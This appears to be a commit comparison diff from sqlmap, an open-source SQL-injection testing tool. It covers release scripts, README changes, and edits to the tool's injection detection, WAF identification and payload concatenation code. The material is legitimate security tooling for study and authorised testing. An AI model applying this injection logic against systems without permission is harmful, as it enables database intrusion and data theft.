Compare commits

..

1 Commits

Author SHA1 Message Date
Miroslav Stampar
4af65f6c41 Preparing for #1250 2016-08-02 00:25:01 +02:00
79 changed files with 3217 additions and 5537 deletions

View File

@@ -60,7 +60,6 @@ Translations
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)

View File

@@ -1,53 +0,0 @@
# sqlmap
[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
Screenshot
----
![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma.
Installazione
----
Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master).
La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap):
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma.
Utilizzo
----
Per una lista delle opzioni e dei controlli di base:
python sqlmap.py -h
Per una lista di tutte le opzioni e di tutti i controlli:
python sqlmap.py -hh
Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601).
Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) (disponibile solo in inglese).
Link
----
* Sito: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Iscrizione alla Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Archivio della Mailing list: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

View File

@@ -23,7 +23,7 @@ HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
# Characters that don't need to be safe encoded
SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
# Prefix used for hex encoded values
HEX_ENCODED_PREFIX = r"\x"
@@ -47,7 +47,7 @@ def safecharencode(value):
retVal = value
if isinstance(value, basestring):
if any([_ not in SAFE_CHARS for _ in value]):
if any(_ not in SAFE_CHARS for _ in value):
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
retVal = retVal.replace('\\', SLASH_MARKER)

View File

@@ -8,16 +8,14 @@ FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
if [ -f $FULLPATH ]
then
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"')
declare -a LINE
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
declare -a LINE;
NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
if [ -n "$NEW_TAG" ]
then
git commit -am "Automatic monthly tagging"
echo "Creating new tag ${NEW_TAG}"
git tag $NEW_TAG
echo "Creating new tag ${NEW_TAG}";
git tag $NEW_TAG;
git push origin $NEW_TAG
echo "Going to push PyPI package"
/bin/bash ${SCRIPTPATH%/*}/pypi.sh
fi
fi
fi;

View File

@@ -10,21 +10,20 @@ PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT
SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM
truncate -s 0 "$CHECKSUM_FULLPATH"
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
if [ -f $SETTINGS_FULLPATH ]
then
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
declare -a LINE
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"');
declare -a LINE;
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
if [ -n "$INCREMENTED" ]
then
sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}"
sed "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH > $SETTINGS_FULLPATH.tmp && mv $SETTINGS_FULLPATH.tmp $SETTINGS_FULLPATH
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}";
else
echo "Something went wrong in VERSION increment"
exit 1
fi
git add "$SETTINGS_FULLPATH"
fi
truncate -s 0 "$CHECKSUM_FULLPATH"
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
fi;

View File

@@ -1,9 +1,6 @@
#!/bin/bash
declare -x SCRIPTPATH="${0}"
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
TYPE=pip
VERSION=1.0.8
TMP_DIR=/tmp/pypi
mkdir $TMP_DIR
cd $TMP_DIR
@@ -25,21 +22,10 @@ setup(
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
url='https://sqlmap.org',
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
license='GNU General Public License v2 (GPLv2)',
license='GPLv2',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Environment :: Console',
'Topic :: Database',
'Topic :: Security',
],
entry_points={
'console_scripts': [
'sqlmap = sqlmap.sqlmap:main',
@@ -62,116 +48,9 @@ See the file 'doc/COPYING' for copying permission
import os
import sys
sys.dont_write_bytecode = True
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
EOF
cat > README.rst << "EOF"
sqlmap
======
|Build Status| |Python 2.6|2.7| |License| |Twitter|
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
Screenshots
-----------
.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png
:alt: Screenshot
You can visit the `collection of
screenshots <https://github.com/sqlmapproject/sqlmap/wiki/Screenshots>`__
demonstrating some of features on the wiki.
Installation
------------
You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: ::
pip install --upgrade sqlmap
Alternatively, you can download the latest tarball by clicking
`here <https://github.com/sqlmapproject/sqlmap/tarball/master>`__ or
latest zipball by clicking
`here <https://github.com/sqlmapproject/sqlmap/zipball/master>`__.
If you prefer fetching daily updates, you can download sqlmap by cloning the
`Git <https://github.com/sqlmapproject/sqlmap>`__ repository:
::
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with
`Python <http://www.python.org/download/>`__ version **2.6.x** and
**2.7.x** on any platform.
Usage
-----
To get a list of basic options and switches use:
::
python sqlmap.py -h
To get a list of all options and switches use:
::
python sqlmap.py -hh
You can find a sample run `here <https://asciinema.org/a/46601>`__. To
get an overview of sqlmap capabilities, list of supported features and
description of all options and switches, along with examples, you are
advised to consult the `user's
manual <https://github.com/sqlmapproject/sqlmap/wiki>`__.
Links
-----
- Homepage: http://sqlmap.org
- Download:
`.tar.gz <https://github.com/sqlmapproject/sqlmap/tarball/master>`__
or `.zip <https://github.com/sqlmapproject/sqlmap/zipball/master>`__
- Commits RSS feed:
https://github.com/sqlmapproject/sqlmap/commits/master.atom
- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
- Frequently Asked Questions (FAQ):
https://github.com/sqlmapproject/sqlmap/wiki/FAQ
- Mailing list subscription:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- Mailing list RSS feed:
http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
- Mailing list archive:
http://news.gmane.org/gmane.comp.security.sqlmap
- Twitter: [@sqlmap](https://twitter.com/sqlmap)
- Demos: http://www.youtube.com/user/inquisb/videos
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master
:target: https://api.travis-ci.org/sqlmapproject/sqlmap
.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
:target: https://www.python.org/
.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
:target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
:target: https://twitter.com/sqlmap
.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md
.. http://rst.ninjs.org/
EOF
sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1` lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5
for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
python setup.py sdist
python setup.py sdist upload
rm -rf $TMP_DIR

View File

@@ -1,15 +0,0 @@
#!/bin/bash
# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/
# http://www.muppetlabs.com/~breadbox/software/elfkickers.html
# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
# For example:
# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
# rm lib_postgresqludf_sys.so
strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
sstrip $*

View File

@@ -74,7 +74,8 @@ def action():
if conf.getPasswordHashes:
try:
conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
conf.dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
@@ -82,7 +83,8 @@ def action():
if conf.getPrivileges:
try:
conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
conf.dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
@@ -90,7 +92,8 @@ def action():
if conf.getRoles:
try:
conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
conf.dumper.userSettings("database management system users roles",
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:

View File

@@ -74,7 +74,6 @@ from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import URI_HTTP_HEADER
@@ -95,13 +94,6 @@ def checkSqlInjection(place, parameter, value):
# Localized thread data needed for some methods
threadData = getCurrentThreadData()
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.intBoundaries
else:
boundaries = conf.boundaries
# Set the flag for SQL injection test mode
kb.testMode = True
@@ -157,7 +149,6 @@ def checkSqlInjection(place, parameter, value):
kb.testType = stype = test.stype
clause = test.clause
unionExtended = False
trueCode, falseCode = None, None
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
@@ -320,6 +311,12 @@ def checkSqlInjection(place, parameter, value):
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
else:
boundaries = conf.boundaries
for boundary in boundaries:
injectable = False
@@ -522,7 +519,7 @@ def checkSqlInjection(place, parameter, value):
if not any((conf.string, conf.notString, conf.code)):
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
singleTimeLogMessage(infoMsg)
logger.info(infoMsg)
# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
@@ -558,15 +555,8 @@ def checkSqlInjection(place, parameter, value):
elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
trueCode = threadData.lastCode
if trueResult:
# Extra validation step (e.g. to check for DROP protection mechanisms)
if SLEEP_TIME_MARKER in reqPayload:
falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
if falseResult:
continue
# Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
@@ -677,8 +667,6 @@ def checkSqlInjection(place, parameter, value):
injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio
injection.data[stype].trueCode = trueCode
injection.data[stype].falseCode = falseCode
injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles
@@ -1329,7 +1317,7 @@ def identifyWaf():
kb.redirectChoice = popValue()
return page or "", headers or {}, code
retVal = []
retVal = False
for function, product in kb.wafFunctions:
try:
@@ -1343,20 +1331,18 @@ def identifyWaf():
found = False
if found:
errMsg = "WAF/IDS/IPS identified as '%s'" % product
logger.critical(errMsg)
retVal.append(product)
retVal = product
break
if retVal:
errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
if not conf.tamper:
warnMsg = "please consider usage of tamper scripts (option '--tamper')"
singleTimeWarnMessage(warnMsg)
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
@@ -1388,7 +1374,7 @@ def checkNullConnection():
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
infoMsg = "NULL connection is supported with HEAD header"
logger.info(infoMsg)
else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
@@ -1396,7 +1382,7 @@ def checkNullConnection():
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET method (Range)"
infoMsg = "NULL connection is supported with GET header "
infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg)
else:

View File

@@ -545,7 +545,7 @@ def start():
kb.testedParams.add(paramKey)
if not injectable:
warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter)
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
warnMsg += "injectable"
logger.warn(warnMsg)

View File

@@ -22,7 +22,6 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap
@@ -47,8 +46,6 @@ from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsqldb import HSQLDBMap
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
from plugins.dbms.informix import InformixMap
from plugins.dbms.informix.connector import Connector as InformixConn
def setHandler():
"""
@@ -68,7 +65,6 @@ def setHandler():
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)

View File

@@ -43,7 +43,6 @@ from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.unescaper import unescaper
class Agent(object):
@@ -344,7 +343,7 @@ class Agent(object):
"""
if payload:
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
return payload
@@ -487,7 +486,7 @@ class Agent(object):
@rtype: C{str}
"""
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*"
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@@ -508,26 +507,26 @@ class Agent(object):
if fieldsSubstr:
fieldsToCastStr = query
elif fieldsMinMaxstr:
fieldsToCastStr = fieldsMinMaxstr.group(1)
fieldsToCastStr = fieldsMinMaxstr.groups()[0]
elif fieldsExists:
if fieldsSelect:
fieldsToCastStr = fieldsSelect.group(1)
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.group(1)
fieldsToCastStr = fieldsSelectTop.groups()[0]
elif fieldsSelectRownum:
fieldsToCastStr = fieldsSelectRownum.group(1)
fieldsToCastStr = fieldsSelectRownum.groups()[0]
elif fieldsSelectDistinct:
if Backend.getDbms() in (DBMS.HSQLDB,):
fieldsToCastStr = fieldsNoSelect
else:
fieldsToCastStr = fieldsSelectDistinct.group(1)
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.group(1)
fieldsToCastStr = fieldsSelectCase.groups()[0]
elif fieldsSelectFrom:
fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query
fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr)
elif fieldsSelect:
fieldsToCastStr = fieldsSelect.group(1)
fieldsToCastStr = fieldsSelect.groups()[0]
# Function
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
@@ -668,23 +667,24 @@ class Agent(object):
concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
else:
warnMsg = "applying generic concatenation (CONCAT)"
warnMsg = "applying generic concatenation with double pipes ('||')"
singleTimeWarnMessage(warnMsg)
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1)
concatenatedQuery += ")||'%s'" % kb.chars.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
elif fieldsNoSelect:
concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
return concatenatedQuery

View File

@@ -813,6 +813,11 @@ def getAutoDirectories():
warnMsg = "unable to automatically parse any web server path"
logger.warn(warnMsg)
_ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url) # web directory
if _:
retVal.add(_)
return list(retVal)
def filePathToSafeString(filePath):
@@ -1195,7 +1200,6 @@ def setPaths(rootPath):
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
paths.SQLMAP_HOME_PATH = _
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
@@ -2223,6 +2227,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
if noneToNull and value is None:
return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode):
return value
elif isinstance(value, basestring):
@@ -2234,9 +2242,6 @@ def getUnicode(value, encoding=None, noneToNull=False):
return unicode(value, UNICODE_ENCODING)
except:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
elif isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
else:
try:
return unicode(value)
@@ -2554,7 +2559,6 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg):
def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError
@cachedmethod
def getPublicTypeMembers(type_, onlyValues=False):
"""
Useful for getting members from types (e.g. in enums)
@@ -2563,16 +2567,12 @@ def getPublicTypeMembers(type_, onlyValues=False):
['Linux', 'Windows']
"""
retVal = []
for name, value in inspect.getmembers(type_):
if not name.startswith('__'):
if not onlyValues:
retVal.append((name, value))
yield (name, value)
else:
retVal.append(value)
return retVal
yield value
def enumValueToNameLookup(type_, value_):
"""
@@ -3581,7 +3581,6 @@ def randomizeParameterValue(value):
return retVal
@cachedmethod
def asciifyUrl(url, forceQuote=False):
"""
Attempts to make a unicode URL usuable with ``urllib/urllib2``.
@@ -4076,11 +4075,8 @@ def getRequestHeader(request, name):
"""
retVal = None
if request and name:
_ = name.upper()
retVal = max([value if _ == key.upper() else None for key, value in request.header_items()])
retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items())
return retVal
def isNumber(value):

View File

@@ -21,268 +21,219 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
FIREBIRD_TYPES = {
261: "BLOB",
14: "CHAR",
40: "CSTRING",
11: "D_FLOAT",
27: "DOUBLE",
10: "FLOAT",
16: "INT64",
8: "INTEGER",
9: "QUAD",
7: "SMALLINT",
12: "DATE",
13: "TIME",
35: "TIMESTAMP",
37: "VARCHAR",
}
INFORMIX_TYPES = {
0: "CHAR",
1: "SMALLINT",
2: "INTEGER",
3: "FLOAT",
4: "SMALLFLOAT",
5: "DECIMAL",
6: "SERIAL",
7: "DATE",
8: "MONEY",
9: "NULL",
10: "DATETIME",
11: "BYTE",
12: "TEXT",
13: "VARCHAR",
14: "INTERVAL",
15: "NCHAR",
16: "NVARCHAR",
17: "INT8",
18: "SERIAL8",
19: "SET",
20: "MULTISET",
21: "LIST",
22: "ROW (unnamed)",
23: "COLLECTION",
40: "Variable-length opaque type",
41: "Fixed-length opaque type",
43: "LVARCHAR",
45: "BOOLEAN",
52: "BIGINT",
53: "BIGSERIAL",
2061: "IDSSECURITYLABEL",
4118: "ROW (named)",
}
261: "BLOB",
14: "CHAR",
40: "CSTRING",
11: "D_FLOAT",
27: "DOUBLE",
10: "FLOAT",
16: "INT64",
8: "INTEGER",
9: "QUAD",
7: "SMALLINT",
12: "DATE",
13: "TIME",
35: "TIMESTAMP",
37: "VARCHAR",
}
SYBASE_TYPES = {
14: "floatn",
8: "float",
15: "datetimn",
12: "datetime",
23: "real",
28: "numericn",
10: "numeric",
27: "decimaln",
26: "decimal",
17: "moneyn",
11: "money",
21: "smallmoney",
22: "smalldatetime",
